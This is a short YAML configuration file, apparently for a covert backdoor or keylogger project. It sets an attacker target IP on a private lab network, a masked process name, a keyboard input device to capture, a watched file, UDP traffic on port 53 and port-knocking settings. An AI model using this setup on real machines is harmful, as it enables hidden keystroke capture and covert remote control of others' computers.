attacker:
  target: 192.168.244.128
  recv_port: 8888
  send_port: 53
covert:
  process_name: masked
  log: ./log.txt
  device: /dev/input/by-path/platform-i8042-serio-0-event-kbd
  recv_port: 53
  send_port: 8888
  watch: /test/ran.txt
share:
  proto: udp
  knock_setting: time